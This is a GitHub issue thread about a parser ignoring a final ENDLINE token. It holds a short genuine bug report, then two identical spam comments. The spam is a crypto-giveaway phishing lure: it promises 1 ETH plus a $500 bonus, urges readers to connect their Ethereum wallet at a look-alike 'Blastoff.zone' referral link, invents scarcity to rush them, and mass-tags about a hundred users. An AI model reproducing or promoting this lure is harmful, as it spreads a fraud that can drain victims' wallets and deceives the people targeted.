### ISSUE TITLE
Ignoring last line ENDLINE token

### ISSUE THREAD

**Issue by suknuk** [mouchist/-ber-FORTRAN#1]
In the given specification of the test/example1.txt file, the output ignores the last ENDLINE token. Need to include a EOF expression for this case

**Comment by suknuk** [comment]
magically works with your code somehow

**Comment by isedwards** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
ss-torres, @chinuslnk, @lianghappy, @izzydavid, @mhalzahrani, @diegobernardes, @aonic, @Thekenyan1, @FuriousClown, @jfarricker56, @abydongroup, @myoauth123, @choudhary, @amrityasingh, @FurkanTsdmr, @bo11ox, @RandomAlien, @akliemke, @lunvs, @tylerbouknight, @izzetemre, @paulschick, @RFARREY, @audipresso, @m-triassi, @donaldhia, @Rxann, @BBUBBA, @ca94523, @Ferhuc10, @coffeeBeansFtw, @dreamephraim, @tampyorhw, @rhl2123, @brunce, @kejianlin, @chou2008, @AustinColby, @cctv130, @BrentKylling, @shoichi-dev, @capjr86, @Team-AG, @youngillyad, @happyjem, @Vdan123, @Confucius-Pei, @AaronCore, @JapurHoller, @eeeycs

**Comment by isedwards** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
mouse325, @harris0704, @genivanss, @viniaero, @tobias97d, @Keyvitia, @MININGSKY, @jorgerance, @hunterlong, @FroggethVonToadenribbit, @AppServiceProvider, @Hansimov, @roshanchoudhury, @tokarev-i-v, @ylmztalha, @Sakat1044, @Yotooon, @rorypeck, @arduino2018, @tburkholder23, @StandonJoyner, @okvlam, @mell00, @zeusAlgo, @devadutta, @twistedthug, @xcellenceit, @BetterYan, @danruto, @zodsoft, @MalykhN, @godkingjay, @evanf, @QwertyQXO, @sasa, @yhammami2121, @orphetov, @cfwin, @nor0x, @tobinngo, @BigB007, @Haruto5627, @Fuhao1212, @GerNov, @chenGit1763113879QQ, @lazebird, @abhishek1720, @mikeinottawa, @BeshoyHindy, @marcosolito
